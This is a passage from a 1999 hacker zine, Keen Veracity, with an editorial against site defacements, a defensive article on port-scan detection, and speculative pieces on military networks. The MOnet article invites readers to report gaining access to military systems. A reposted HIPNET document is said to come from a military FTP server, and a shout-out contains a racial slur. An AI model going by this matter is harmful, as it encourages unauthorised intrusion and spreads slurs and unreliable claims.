/* Keen Veracity...................................Volume 3, Issue 8 */
e e eeee eeee eeeee ee e eeee eeeee eeeee eeeee e eeeee e .e
8 8 8 8 8 8 88 8 8 8 8 8 8 8 8 8 8 8 8
8eee8e 8eee 8eee 8e 8 88 e8 8eee 8eee8e 8eee8 8e 8e 8e 8eeee8
88 8 88 88 88 8 8 8 88 88 8 88 8 88 88 88 88
88 8 88ee 88ee 88 8 8ee8 88ee 88 8 88 8 88ee8 88 88 88
88 Keen Veracity Technical Journal July 21st, 1999 88
88eeeeeeeeeeee. . Legions of the Underground . .eeeeeeeee88
[most of the editing done by headflux]
.-[ Keen Veracity, Volume 3, Issue 8 ]
|
|__Introduction
| |_ kv[1]; General Information..................................staff
| |_ kv[2]; Statement........................................optiklenz
|
|__Computer Security
| |_ kv[3]; Port Scan Detection..............................t0ucht0ne
| |_ kv[4]; Introduction to MoNet...............................uplink
| |_ kv[5]; Article on HIPNET..................................zipcode
| |_ kv[6]; Intrusion Detection Systems......................ProtocolD
| |_ kv[7]; Another IE Exploit?.................................ntwak0
| |
| |__Programs/Source Code
| | |_ kv[8]; tryseg.c.........................................guidob
| | |_ kv[9]; match.c...........................................icesk
| | |_ kv[10]; netsniff.c (reprint)...........................mnemonic
| | |_ kv[11]; liberty.c........................................guidob
| |
| |__Miscellaneous
| |_ kv[12]; Ode to JP....................................krankshaft
| |_ kv[13]; Top WWW Sites...................................ntwak0
|
|__Telephony/Radio
| |_ kv[14]; Intro to Loops.....................................hitman
|
|
|_ kv[i]; outro
kv[1]; /* General Information..................................staff */
SYSCON IS BACK AND IN EFFECT: http://www.legions.org/syscon for info
[posse]:
```````
cap'n'crunch
optiklenz uuuuuu uuuu
aphex guidob uuuuu uuu
[havoc] touchtone chiXy uuuuu uuu
lothos slfdstrct ntwak0 uuuuu uuu
headflux ProtocolD uuuuu uuu
kingbong touchtone uuuuu uuu
Kanuchsa uuuuu uuu
Digital Ebola uuuuuuuuuuuuu
duncan silver uuuuuuuuuu
uuu
[lou] www.legions.org
efnet - #legions come hang with
grouppiez, and other cracked out porno stars
- legions ircd still being tweak'd
[shoutouts]: no one in particular
```````````
[copyLeft]: whatever...
```````````
Download Pictures of Legions at Defcon7 from the following sites:
===============================================================
***| http://defcon.legions.org
***| http://www.legions.org/defcon7/index.html
ef-te-pee
================
***| ftp://www.underzine.com/rootfest/defcon/defcon7.html
----------------------------------------
call the authorities optik's drunk again
----------------------------------------
<cripto> gimme shouts next issue
<cripto> for being a p1mp.
<optiklenz> sure
<cripto> word.
<optiklenz> joe gotta hand cuff yur hoes doh
<cripto> nice zine, btw.
<optiklenz> so they dont be mewvin when i try to humpzorize em
<optiklenz> thnks
<cripto> articles with real substance.
<cripto> makes b4b0 look like dr. seuss.
-------------------------------------------------------------
it's just a matter of taste... Some people obviously have it.
-------------------------------------------------------------
kv[2]; /* Statement........................................optiklenz */
Something needs to be said...
First off...
Earlier this year an assembly of organizations decided
to release a joint statement "condemning" Legions. This
evidently was before any of them contacted Legions requ
esting information on what the true plight was. Because
of some iniquitous media converage a few people misunde
rstood our motives. This of course is in regards to the
past "China Human Rights incident".
We wanted to bring a tragic predicament to surface so
other people could speak out as well. The media was mis
informed when they reported about our goals to aid these
countries in their fight or freedom of speech. They (th
e media) stated we (Legions) wanted to damge certain com
puter networks in other parts of the world. We wanted to
help them with the situation concerning their lack of fr
eedom, and human rights why would we want to destroy or
damage their networks the same networks that give them what
little freedom they have to communicate as people. That
just makes no sense at all. I ask that the people who joined
to make the statement condemning Legions take that into
consideration and next time contact us so that we could discuss
things, and clear up misunderstandings. It's not a funny matter
when peoples lives, and reputations are at stake.
As hackers the
computer has built our lives, and in turn we have
built our lives around the computer we would never
choose to harm such a valuable resource. The term
hacker doesn't discriminate. You can be a federal
agent, but the best damn coder in the world and in
the sense of the word you'll be a hacker. Bill Gates,
a hacker turned billionaire. Software designers, security
specialist the people who help protect your networks these
people are hackers. " Information, and data
is to be cherished, (for it can only build you not hurt you)
cultivated and developed not to be annulled or locked
up. Hacking is an expansive applied knowledge in any
technical field. Destruction, and the unschooled acts
of those who live with out moral are what separates the
"hackers"(those who's main purpose of life is to learn,
expand, and apply what they learn) from those that go
as far as turning the computer on."( -The previous quoted
statement was excerpted from Keen Veracity 3 www.underzine.com).
Something serious is going on at the moment. A string of "attacks"
against our own government. And till now no one has said anything.
The actions of these groups are sincerely
half-witted, and absurd for it will at the end accomplish nothing except
a few more long term jail sentences. The current actions of
these self-proclaimed "hackers" have me infuriated.
The people DOS'ing government sites, and defacing mil, and
gov domains, and damaging information these people
aren't hackers they are nothing more than unschooled
adolescent teens with nothing better on their hands.
They are an endangerment to the true aspect of computer
science dealt with by the hacker community.
Call what they are doing what you want, but don't call
it "hacking" because it's not. So many articles have
surfaced which referred to what these cracker cults
are doing as "hacking" ex; "Hackers attack government" -
"Hackers strike again" (false) Call them destructive call them by
their first name but for the sake of god don't just yank
out the term "hackers" for a better story for the sake of
god don't defile the name "hacker" for your personal gain.
A hacker lives by a strong code of ethics. We wouldn't be
issuing this statement if we didn't.
A government investigation is currently pending on the above matters
If we dont do something about this now the government will surely
hold us accountable, and I'm not talking jail time. We have a lot to
lose if we dont stop these people from making us look bad. Though
we are not affliated with them directly certain mainstream
media has left a misleading trail. Some of our rights as computer
partisans may be a stake here. With that said I ask that all sites
that archive these senseless hacks suspend documenting these fatuous
acts for the time being. The script kiddies that go
out and target government and military servers are media crazy, and
you are only adding fuel to their fire by flashing their work to the
public. A note to the lamers This is where it ENDS... In the
end it's what you choose to do that makes you who you are.
So make sure what you choose to do doesn't make you look like
an ass.
http://www.hackernews.com/archive/1999/noaa/index.html
http://www.hackernews.com/archive/1999/army/index.html
http://www.hackernews.com/archive/1999/monmouth/index.html
http://www.hackernews.com/archive/1999/argonne/index.html
http://www.hackernews.com/archive/1999/nswcl/index.html
http://www.hackernews.com/archive/1999/senate2/index.html
http://www.hackernews.com/archive/1999/bnl/index.html
http://www.hackernews.com/archive/1999/doi/index.html
The above is an archive of recent government, and military site
defacements done by what seems to be comparable to the works of
5year olds...
Look at the archived sites, and tell me something doesn't need to be done.
Just letting people know we aren't going for their childish actions.
We dont advocate any of the trash being done by these uninspired idiots.
we're "hackers" the other white meat!
------------------001----------------------------------------------
the below is an email, and responce excerpted from Keen Veracity 4
-------------------------------------------------------------------
[mail] <plankton>
Do you still hack?
[responce]
Well it depends on your analogue of hacking. By the authentic
formalization I "hack" everyday. Whether I'm coding, or doing
Network checks it's still hacking. Hacking has little to do
with the "illegal" entry of computer systems apart from the
Technical, and systematic aspect of it. Illegally accessing a system
for no intended reason is not something I advocate or
advise performing. What I suggest achieving is going out, and
learning, and questioning the system itself before trying to exploit it.
And even once you feel you have a broad knowledge of the system make sure
you use what you know to build things, and not fuck things up.
System admins who are affected by crackers turn to hackers in
order to secure their systems. They turn to the philosophies,
documents, and programs written by "hackers"... Let's not
make them look the other way. We are here, and we are skilled.
What your brain dead system administrator can do in a week we can
accomplish in a matter of minutes more practically. That's the message
that should be put across. One of positively not one that says "Were
going to take you down." Read my introduction in Keen Veracity
3 I go into greater detail on the subject at hand.
http://www.t00ned.org/optik/kv/kv3.txt
-Steve Stakton <optiklenz>
Steve Stakton - <optik@shockimaging.com> -(optiklenz)
-Head Security Advisor for NACC
Legions Of the Underground - Our title name is not meant to seem
dark. Don't get the misconception that we are some sort of
cult or only wear black. The computer Underground is a symbol
something that is important, and we treasure it's existence so in
it's honor we use the name Legions Of the Underground.
We are just a bunch of computer enthusiast who
enjoy working together. Nothing more nothing less.
-----BEGIN PGP PUBLIC KEY BLOCK-----
mQGiBDR6E3wRBADHm2aiODOCowgDqXdcFvooCTrQe6tDPqznXChCO1p0t12hhQZe
0C+/xBorkJXlqOaDadmUQVZP3Kij97SOTWU1AS1SPSTzF6VAylHalGz9iUHjxa7g
SSAVrLUMngWG7hxnz7lBHFIQ8iQPjWvK5qhEQ9vcBF9ped9StPRsZlljIwCg/02Z
XXrVaJUtWAxUaAARUdPt0FsEAKyhGuQA1HgGWM/GQxpvBvmDqHkNGxM9YyrF1Dg1
PWAoNuG8GdJazj18c2AODp68NwPH0dUYTxKc4ejR//OcOfl1HRfE0thJEDpqkSyQ
2iobKGkYdmug666pe0Xr3wkgBE+rnzC3RLlUdnRAu25MuEqlc6yRWAT0YH/Pl9IB
eDRGA/4uAuFiEiyfd3Djhi7Wwh8/qiG7SChW0arEXq3RqHQqd3EaVR1FgNzCtvxg
kK2mY07XeSX2fjlWo4ynrBdl5QXbOn9X+GzDcw1z9FBVQHaY0EJMoE0fb53bTyCG
0bdCMTid1DUKhJeekW6cPZvRQlu5IjH/+FVT9S38UsAMMwwrCrQlU3RldmUgU3Rh
a3RvbiA8b3B0aWtsZW56QGxlZ2lvbnMub3JnPokASwQQEQIACwUCNHoTfAQLAwEC
AAoJEGgSVovfJxzQFfcAn0WybtLnFw9jf9agk7xUaikjEjLkAKCYfA1rx/SXP5Je
v5R0+ZVMqIGiibkCDQQ0ehN8EAgA9kJXtwh/CBdyorrWqULzBej5UxE5T7bxbrlL
OCDaAadWoxTpj0BV89AHxstDqZSt90xkhkn4DIO9ZekX1KHTUPj1WV/cdlJPPT2N
286Z4VeSWc39uK50T8X8dryDxUcwYc58yWb/Ffm7/ZFexwGq01uejaClcjrUGvC/
RgBYK+X0iP1YTknbzSC0neSRBzZrM2w4DUUdD3yIsxx8Wy2O9vPJI8BD8KVbGI2O
u1WMuF040zT9fBdXQ6MdGGzeMyEstSr/POGxKUAYEY18hKcKctaGxAMZyAcpesqV
DNmWn6vQClCbAkbTCD1mpF1Bn5x8vYlLIhkmuquiXsNV6TILOwACAgf+OCRz2nG+
SSCrgZY2nIGz68SO+2h3weFMzdBSWQDjZ5Fa7GjRBPeTRQvectPvSqcwjeZTq8DE
1AVI/oFw1mChgfV7CgQuC+P0OK+jr6tIwyhM6gdo5NEdD7/uLWJfFi2l/AP4skVv
ydmg1KGlxjvtjOFKhOGoV2vSTPRGn1l1lCzBZPRur0xTtNwk5b54o8g/NlMEsO/p
/P6CRP4J1WlDkH66jST+ygAYNN0AtRy0eEPUxu7+dYC4OgT0xCcglCqKf7hnMGrf
s/I2MHBbhSmdtcW5pLYcEb8iwXEitGN+plAy+OZrygJ4ytFAdnL2r9NmegUPTYz0
3t4M3hiITUmiP4kAPwMFGDR6E3xoElaL3ycc0BECKBQAoKqOQNZ82RmU4rsZRM9l
a6QdQeSVAJ469y3cLO1eU5oMYpLdvSGevh0mSg==
=cpan
-----END PGP PUBLIC KEY BLOCK-----
kv[3]; /* Port Scan Detection..............................t0ucht0ne */
Port scanning, Everyone does it. Whether it's an administrator trying to
find out what is being spoke on a remote node, or a 15 year old script kid
looking for exploitable boxes, port scanning is the first step in
identifying services on a networked machine. I've always been bewildered
when I've had conversations with network security experts and semi-aware
administrators who explain to me that they've invested a lot of money and
resources into the latest firewall technologies and intrusion detection
software, yet never even considered port scan detection tripwires. Being
aware of port scans can alert any competent sysadmin of potential
compromise long before it's too late. With the wealth of software out
there dedicated to finding everything from open NetBIOS shares to web
server exploitation, port scan detection software becomes more important
then ever. Furthermore, it's safe to say that making your boxes layer 3
aware is a good idea. Even a wayward ICMP Echo can be the first sign of a
lurking intruder. In this whitepaper, I'd like to talk about several
packages that encompass making your network "probe" aware. I will talk
about the pros and cons of automated defenses employed by these packages,
plus give a general overview of why itÕs a good idea to also be layer 3
aware.
The first important thing to recognize is that port-scanning software has
made some significant advances in the last year or so. They have become
stealthier, faster, and smarter. For example, two years ago, most people
were using Strobe written by Julian Assange
(ftp://suburbia.net:/pub/strobe.tgz). It was quick and dirty (possibly
still the fastest port scanning software to date), and would spit out the
services spoken at the other end. Now, most people are using NMAP, written
by Fydor (http://www.insecure.org/nmap), which not only does port scan
detection, but will also do TCP fingerprinting, compare the fingerprint to
it's database, and guess what O/S is at the other end. It's capable of a
myriad of different scans, including a stealth scan that can beat a lot of
port scan detection software. So, with one little piece of software, a
potential cracker can identify the services being spoken on your networked
host, what operating system is being run, and do it undetected. Scared?
You should be. In many aspects, it's pointless to remove operating system
specific banners from your daemons because software like NMAP and Queso do
a great job of identifying the O/S through TCP fingerprinting.
Unfortunately, a lot of admins and network engineers aren't even familiar
with these programs, but those that are, realize how important it is be
atleast semi-aware of when these tools are being used against them.
"So, T0uchT0ne, what can we do about this?" I hear you asking. I'm glad
you asked, because we now are going to discuss several options that are
available. My personal favorite is Abacus Sentry
(http://www.psionic.com/tools/portsentry-0.90.tar.gz). It's a piece of
software written by Craig Rowland as part of the Abacus Security Project.
Sentry has the ability to detect port scans, and implement automated
defenses. These defenses can encompass everything from entering the
offending machine into your routing table (routing the host into oblivion)
to adding the attacker to the hosts.deny file. Even more exciting, is the
ability to add custom commands to the Sentry configuration file that would
allow you to be paged or emailed in the event of a port scan trigger.
To understand what happens with port scan detection software, we need to
cover some basic concepts with how a TCP connection is established. Host A
sends a TCP segment to Host B with the syn bit set to 1, and the ack bit
set to 0. This makes sense, since the first step in a connection is to
syn"chronize" Host A and Host B. Host B then responds with a TCP segment
(notice that I'm not using the term packet, because to TCP, there is no
such thing a packet, don't make this mistake.) that has the syn bit set to
1 and the ack bit set to 1. After the initial handshake, both hosts sends
the TCP stream with the syn and ack bits set to 1 right up until the
teardown of the connection. This is a very simple explanation, Suffice to
say, I've not gone into explanation of how sequencing works, etc., because
this is not a whitepaper on TCP, but on port scan detection. Most port
scanners work on this simple principle, of opening TCP connections to a
host, and seeing what answers on the other side. The secret to port scan
detection is making sure you have something that is listening on ports
that don't normally have daemons installed. Since we know FTP is usually
on port 21, and there is already an FTP daemon installed on port 21, we
canÕt bind a sentry device on it, since no two daemons can monitor the
same ports. Fortunately, the good news is, the implementation of port scan
detection is incurred through the basic understanding that most intruders
are scanning a range of ports from 1 - 1024 (and higher) in a sequential
manner. Since we can't bind to 21, let's bind to 22, 23, 24, 25, etc.
(excluding ports with listening daemons). If a connection is made to port
22, and we don't have a service on port 22 (which we do, but it's our
sentry software) then we know there is a good chance that a port scan is
being run. Of course, you don't want to trigger your defenses based on one
un-used port. That is why Abacus Sentry allows you to set the "trigger".
For example, on my hosts, I usually set a trigger of 2, so that it takes 3
consecutive ports with no services on them to be hit before you get
entered into my hosts.deny file or routed to nowhere.
I hear you calling foul. Yes, but I could spoof my source address to be
your upstream router, and the next thing you know, your machine is cut off
from The Internet. True. You could. This is one of the downsides of port
scan detection software. It can be used against you to deny your service.
This shouldn't stop you from using it. Here is why.
First off, with Sentry, there is a file called "hosts.ignore" that allows
you to configure the detection software to never take action on specific
hosts. I've gotten into the habit of tracerouting out of my network to
different hosts, and recording which routers within the upstream I usually
go through. I enter these routers IP addresses into my hosts.ignore file.
This isn't foolproof, but for the most part, does a lot more good then
bad. For the record, in the 2 years I've used Abacus Sentry on a myriad of
different networks, I've never been the victim of a DoS attack where
Sentry was used against me. My opinion is that (and this is also the
opinion of the author of Abacus Sentry) is the benefits of using port scan
detection software far outweighs the cons.
I also believe in using JAIL (Just Another IP Logger), which you can find
at www.genocide2600.com/~tattooman using their search engine. Logging ICMP
traffic is the mark of a good security admin. Sure, you don't need to log
all ICMP traffic, but logging echoes and destination unreachables is a
sure way of catching the first steps in an attack. Granted, most echoes
and other ICMP traffic is legit, but when you see a ping from some host in
Germany, and you know you don't have any customers or users in Germany,
something could be up.
Configuring your syslog daemon properly, and logging all your scan
detection software to one file can allow you to write some pretty snazzy
perl scripts to boot. I'll leave this to your imagination.
If you have any questions, or want to offer me some good advice on past
experiences you've had with detection software, email me at
root@t0ucht0ne.ca. I'd love to hear from you.
Shout Outs: All of Legions of the Underground and #legions, Drown, Mopar,
most of #hacking, Stratus (where ever you are), Kweiheri (you will be
owned by Kwei), NodeRaTz, and The White Niger (pronounced Ni-Jer).
* T0uchT0ne #
[-------------------------------------]
kv[4]; /* Introduction to MoNet...............................uplink */
01001101 01101111 01001110 01000101 01010100
.-.-.-. .----. .-..-. .---. .---.
| | | | | || | | .` | | |- `| |'
`-'-'-' `----' `-'`-' `---' `-'
Information compiled and written by lowtek aka uplink
of
Legions Of the Underground
http://www.legions.org
01001101 01101111 01001110 01000101 01010100
Introduction
MOnet (Multi-wavelength Optical Networking Technology) is about the most
advanced network that is in progress at the moment besides SOnet. It
combines all of the government/military applications. MOnet is connected
to many military domains. Many bell RBOC's and Private Telcom Companys
are working on the project together such as:
AT&T
Bell Atlantic
BellCore
Bellsouth
Lucent Technologies
Pacific Telesis
SBC/TRI
NSA
DARPA
MOnet is being put into progress in WASHINTON D.C. and is a 100 million
dollar project from good old .mil (dont you just love where your tax's are
going?) it is funded by ARPA (advanced research projects agency) Monet is
basically SOnet but it has been improved. The way it was improved is that
it signals data through wave lengths of light. This way of transporting
data is very fast and very effieciant.
The MOnet in Washington is interconnecting Bell Atlantics Silver Spring
Labratory also the Naval Research Labratory, and the National Security
Agency. This network is being expanded all the time to group together
other such government groupings. The New Jersey MOnet at the moment is
interconnecting The Red Bank of New Jersey and is currently been tested at
the speed of 2.5 G/bits transmission.
Impact
Assessing Multi-wavelength Optical Networking (MONET) for commercial
viability and Government applications Balanced approach with focus on
economics & architectures, enabling technology, and networking testbeds
Demonstrating networking through experimental interconnected networking
testbeds (in NJ and DC) Strong team representing equipment manufacturers,
management software developers, and network operators Technology transfer
through commercialization by partners
This shows MOnet's actual gates and connections:
NSA
|
DARPA |
| |
| |
| |
| ----------------------------- |NASA
| | | |
--------| | |
DISA----------------| |------|
--------| MOnet |------------------GateWay
| | |------|
| | | |
| | | |
| |___________________________| |
| | |DIA
DISA |
|
|
|
NRL
This shows MOnet at its last stage complete which includes DIA, NRL, DISA,
NASA, and DARPA. These are all very important military operating groups
that provide the power of MOnet.
And whats this GateWay? huh? ohh so there is an actual way into the
system. yes there is but to get into MOnet is to be able to pretty much
hack anything. This system does not only use high DES encryption but also
uses hardware encryption (just like SIPERNET). These gateways
supposedly can be accessed through dial-ups in Washington D.C. and New
Jersey also through a domain that is hosted by MOnet.
c0mputer
|------| Logging on via
| | -----> ------>
dial-up connection | |-----------------|the
/----------------|------| | Internet
/ This represents a |
\|/ computer logging on via |
| the internet and via dial-up |
\|/
|
\\//----------------------------|
| | \\//
| | |-----GateWay Through the
| | | Internet
Modem Pool | |
| |
| |
|--------------|
|
|
|============================================|
|Dial-up connections and internet connections|
| Bundle together and transfer straight into |
|--| MOnet |
| |____________________________________________|
| |
| |
| |____________________________________
| | |
*------------------> | |
| MOnet |
| |
|____________________________________|
This is a security threat that it can be accessed over the web because if
you do this you may enter MOnet without having to deal with the
encryption. Now only some .mil domains and only some .gov also. If you
reach these or get access any other way please e-mail me so I can update
this text at lowtek@uswestmail.net
MOnet will continue to grow within the United States and start to progress
to other buisness's. This network is still in its starting stage but is
finally becoming up to date a bit. I could not find any other info on
this subject (considering the fact that they want to keep it secret).
[-------------------------------------]
kv[5]; /* HIPNET........................................... .zipc0de */
I found this file on a military ftp server, which I
thought was very interesting so I saved it along with
other documents, as it turns out it's on the HIPNET,
which is a military network used by our government.
If you have some more information on the HIPNET please
e-mail me at zipc0de@hotmail.com and I'll include it in
my further text files on military/government networks.
As for now enjoy the file and don't get into trouble :]
HIPNET User Requirements
Revision 4.0
1. Introduction
The High Performance Network (HIPNET) seeks to develop a reliable
multicast transport protocol and IP QoS mechanisms which satisfy
requirements of US Navy and French MOD applications. The applications
are multimedia in nature and include: bulk file transfer, image
transfer, audio/video, email/messaging, interactive planning missions
(whiteboarding) and simulations, realtime data transfer,
teleconferencing and others. The requirements that these applications
impose on the transport protocol and the IP QoS facilities are
examined in this paper. The general requirement is a reliable
multicast service, yet, there are many variations of this service.
There are two highly variable aspects to a reliable multicast service:
reliability which spans a spectrum from best effort to absolute and,
ordering, which might mean anything from simple source delivery to causal,
total ordering. Several existing protocols provide reliable multicast
service, yet none has achieved the status of open standardization
acceptance. One overriding requirement of the US Navy user community
is the requirement that the reliable multicast service be provided by
a protocol that is accepted as an open standard, much as TCP and IP
are in today's Internet.
This paper is a culmination of a three-stage process. The first is to
define a chart of communication characteristics that can be used to
distinguish applications relative to their requirements (section 3).
The second is to define a list of generic applications that encompass
the totality of all envisioned applications and then to apply the
characteristics chart to each of them (section 4).
2. The Operational Environment: Communication Channels
Consideration must be given to the characteristics of the
communication channel over which the data will be transmitted.
The communication channel characteristics for the US Navy and
French MOD vary widely, depending on the operational environment,
and range from low data rate, simplex channels to high capacity,
ATM channels. Part of the channel characteristics could include
asymetrical networks where the data channel transfer rate between
sender and receiver is different than the rate between receiver andsender.
This would provide a communication environment that is
vastly different than the normal communication channel characteristics
which could include Ethernet, FDDI or ATM. Therefore, each
application must be able to specify those critical characteristics
that the communication channel must support in order for the
application to be able to meet the mission requirements.
The project, however, must focus on a subset of this entire
range in order to live within budget and time constraints, therefore,
the operational environment identified for HIPNET is ATM and
IP over ATM.
3. Communication Characteristics
The user applications can only meet its mission requirements if the
underlying communication architecture provides the mechanisms to either
define or control a specific characteristic that is needed to meet the
specific requirements of the user application. Some of these mechanisms
could be located within the user application itself, the underlying
transport service or as part of the network interface. There are
tradeoffs in determining the optimum location for each of these
mechanisms since each location may have significant performance
or user compatibility requirements. Specific characteristics are outlined
in the following paragraphs. As part of the user applications requirements,
the user may wish to send data to either one receiver or multiple
receivers. Depending upon how this mechanism is implemented, this
could be accomplished using one protocol architecture that provides
both capabilities or two separate protocol architectures.
3.1 Group Management
The key issue in group management is: does the application need to
identify the receiver group, i.e. have group knowledge? The
knowledge could be total, partial or none. If the knowledge is
total, then the group is said to be known. If the knowledge is
partial, then the group is said to be partly-known. If no knowledge
of the group is required, the group is unknown.
Multicast groups could consist of fixed or dynamic memberships.
The management of the groups could take place external to the
transport protocol and in some cases be manually performed. Any
protocol running over IPv6 has the IGMP (Internet Group Management
Protocol) available that provides network level functions for
joining/leaving/routing of groups. IGMP is sufficient in many
cases, but, if the application needs any control over the membership,
or monitoring of the membership, such capability must be performed
above IGMP. The size of the multicast group, the method of either
joining or leaving the group, and the responsibility for maintaining
the configuration of the group are characteristics that could
be different between specific user applications that would still
use a common reliable multicast protocol. An additional requirement
could include the ability to support multicast receivers who may
temporary leave the multicast group but want to maintain current
with data that was transmitted while they were not part of the
multicast group.
Applications define a group managment policy that may allow dynamic
joins; may limit admission to a multicast association to a subset
of the participating nodes or may not allow any nodes outside of a
fixed membership to join. The join/leave policy is also affected
by the reliability constraints, for example, an application may
require atomicity: the ability to deliver within a specified
interval once it's deliver to one of the group, to all members
of the group. Since the policy of group membership is so application
dependent, it makes sense to not implement group policy in the
protocol stack, however, this does not relieve the protocol stack
of responsibility to provide necessary group management funcitonality
for application use.
An event like a node joining or leaving a multicast group may or
may not require notification depending on the reliability
constraints and security policies. The notification may be required
by a central controlling node ( a server or master side) or it
may be required by the rest of the group. The policy will be
established by the application, however, the tranport layer may
be required to have mechanisms necessary to effect such events.
3.2 Topology
Applications differ in their requirements for data flow
direction. Some applications (e.g. broadcast TV) involve a
single transmitter and a group of receivers. This arrangement is
referred to as point-to-multipoint (PT->MP) communications.
Another arrangement is to allow the receivers to transmit back
to the sender (MP->PT) (sometimes referred to as concast), but not
to each other. Yet another is the topological configuration in
video teleconference which is multipoint-to-multipoint (MP<-->MP).
3.3 Scalability
Scalability makes the mechanisms necessary to implement a reliable
multicast and an IP QoS an issue. Multicast's most basic benefit
(that the number of transmissions is reduced from the unicast case)
may be negated if acknowledgements are required from all receivers.
There are schemes for minimizing the amount of control packets from
receivers to transmitters and for limiting the number of retransmissions,
however, the basic dilemma remains. One scheme is to have the
receivers send a negative acknowledgement (an explicit request for
retransmission) instead of positively acknowledging each packet,
however, the NAK algorithm may also degrade under implosion given a
sufficiently large receiver set. There are schemes for limiting
NAKs as well as ACKs, and often hybrids are proposed. A tree
strucutured set of proxy receivers where the proxies assume
responsibility for reliable delivery is one such scheme.
Some applications negate the scalability issue if the number of
participants is guaranteed to be small. An example would be email
multicast on an organizational basis where the number of
organizational units is small (say less than 15). Another example
is a video conference in an N X N configuration (all participants
are both sender and receiver), and might not consist of more than
15 people.
On the other hand, applications that execute in small-scale groups
today may need to accommodate large groups tomorrow because of
the explosive growth of the Internet and its associated applications
and unforeseen uses of those applications. Put another way: it's
difficult to predict future uses of technology based on past experiences.
The Internet itself, for example, was created primarily to service
file transfers and remote logins. Only after the technology was
created and utilized, did researchers realize that its main use would
be for the exchange of email (and, subsequently, access to the World
Wide Web).
3.4 Data Ordering:
The delivery of data from the multicast sender to the multicast
receiver may require that the delivery service support a range of
ordering including none, source, causal, or total ordering. Source
is an ordering that a unicast transport protocol like TCP would
provide by delivering messages between a pair of participating
endpoints in the order that they were transmitted. Causal is an
order that guarantees that all messages that are related are ordered,
such that, a receiver would not receive a particular message if
all related messages had not previously been delivered. Total
order means that multiple streams from multiple senders are delivered
to each receiver in the same relative order. There are often
requirements in distributed processing for variations on these
ordering properties for the purpose of attaining consistency,
fault tolerance, and stability. The support of total or causal
ordering typically requires the transport protocol to provide a
timestamp of some sort.
3.5 Reliability Range:
As stated earlier, the user application may require a range from an
absolute guarantee that all receivers have received the data to the
best effort reliability provided by the transmission characteristics
of the communication channel. Absolute reliability requires
acknowledgements for all data packets transmitted and implies total
knowledge of the receiver set. There are partial reliability
requirements imposed by some applications such as a k-reliability
mode wherein data transmission is successful if k receivers acknowledge
the message, Some applications may impose the requirement that a
majority of receivers acknowledging receipt is sufficient. Another
aspect of reliability is that of atomicity: if the message is
delivered to any in the receiver set then it must be delivered to
all members of the set. This could be the case, for example, in a
distributed database application where consistency is an important
requirement. Data may require a reliability mode of most-recent
(or freshness) that requires reliability but only within a latency
bound (a lifetime is associated with the data).
The method of assuring reliability must be balanced against other
requirements placed by the user on the communication channel. This
may become a negotiated function between the user application and the
underlying communication channel. In addition, the definition of
reliability may have to be established by either the user application
as a multicast sender or the user application as a multicast receiver.
3.6 Quality of Service (QoS):
A QoS capability might make use of a resource reservation mechanism
which permeates the communication protocol layers such that a certain
level of performance is guaranteed. QoS parameters include latency,
throughput, jitter, precedence, reliability and capacity.
Applications that don't require QoS are satisfied with only best
effort delivery services.
The characteristics required by the user application of the
communication channel may be defined as individual items or they
could make up a single QOS requirement that is passed from the
user application to the underlying communication channel architecture.
A standard format may be required so that each user application
is not required to develop their format for defining specific
characteristics for the communication channel.
3.6.1 Communication Channel Throughput:
The user application may require that the communication channel
support a required transmission rate, or throughput, from a
sender to either a single or multiple receivers. The throughput
rate might be expressed as a burst rate and/or a sustained rate.
The rate reflects the applications ability to inject traffic
into the network. The acceptable rate might vary depending on
the available resources, for example, a video conference over
a T1 circuit might specify its requirement as a 128 Kbps service;
whereas, the same conference over an ATM circuit might require 1
Mbps service. This reflects the fact that the user's perception
of a required QoS might change relative to his knowledge of the
resources available. The ability of the communication channel to
support a specific transmission rate may require negotiation between
the user application and the underlying communication channel.
3.6.2 Communication Channel Latency:
The user application may require that data transmitted by the sender
must be received by either a single receiver or multiple receivers
within a specific delay. The latency could be expressed on a
per-session or per-message basis. The application can indicate
the minimum delay that will be noticable to the application. This
provides information to the negotiation process that can then
determine when to cease the negotiation for the requested latency.
The distance from sender to receiver will strongly influence
achievable delay, thus, the application may need to negotiate the
delay parameter depending on the communication path available.
3.6.3 Communication Channel Jitter:
Jitter is the variation in the end-to-end delay caused principally
by media access delays and queueing delays. Jitter can be
compensated for by adding a variable delay at the receiver.
Jitter is a concern for streams (like audio and video) that
require synchronization. Jitter is also an indication of the
amount of congestion in the net and may provide important feedback
to the QoS mechanisms..
3.6.4 Precedence/Priority
Applications often need to expedite delivery of certain messages.
This could be on a per-session basis or on a per-message basis.
Some applications need to define the importance of their data
according to a system-wide scheme. If the network media supports
priorities and the operating system is capable of real-time
performance, end-to-end delays can be bound.
3.6.5 Reliability
Foreward error correction (FEC) techniques are used to guard
against errors by including with the data transmissions redundant
data bits which can be used by the receiver to detect, and, in
some cases, correct, certain bit errors. FEC provides reliability
at the expense of channel bandwidth and transit delay, but is
helpful when applications cannot tolerate retransmissions.
The error characteristics of the communication channel determines
the degree of redundancy required. Noisier channels require more
redundancy. The QoS parameter of reliability, therefore, is
communication communication channel dependent.
3.6.6 Capacity
The QoS throughput parameter dictates a certain network level
capacity. For example, a video conference might specify a
throughput requirement of 1 Mbps. The network QoS mechanism
would need to choose a capacity range above 1 Mbps. The
communication environment, however, might limit the application
to a certain capacity, therefore, this parameter is also
communication channel dependent.
4.0 Applications:
There are many different user applications that could be specified
as using data transmission protocols. They have been developed
to meet different mission requirements however, as an combined
group, they could have common or different requirements for the
communication channel based on the need of a specific mission
requirement. Rather than look at the requirements for the user
application as defined in a specific mission, the user applications
data transmission requirements can be generalized in terms of the
type of data to be transferred. These data types are:
a. Text Message/Email
b. File/Image Data Exchange
c. Voice/Video Conference
d. Voice/Video Broadcast
e. Interactive Multi-Media
f. Time-sensitive Data Exchange
g. Time-critical Data Exchange
h. Replicated Data Base
It is helpful to map military applications in each of these
classes to commercial applications:
Generic Application
Commerical Applications
Military Applications
Text Messaging/Email
Email, News, WWW
DMS,JMCIS,GCCS,APS
File/Image
Weather maps (imm)
JMCIS,GCCS,DMS
Conference
vic,vat,wb
VTIXS
Broadcast
public radio,freeway traffic
JDISS, JMCIS
Interactive Mulitmedia
vic,vat,wb
GCCS
Time-sensitive
virtual games,stock quotes
JMCIS
Time-critical
air traffic control,stock quotes
combat systems
Realtime DB
distributed process, stock quotes
JMCIS
In the sections that follow, each application is evaluated according
to the characteristics chart developed previously. It is not possible
for the project to address each of these applications or application
classes. The project's focus will be limited to non-realtime
applications like bulk file transfer.
4.1 Text messaging/Email
4.1.1 Application Use
Applications in this category include official organizational messages,
email, message paging, facsimile, bulletin board, and newsgroups.
X.400 email is the prototypical application in this category and
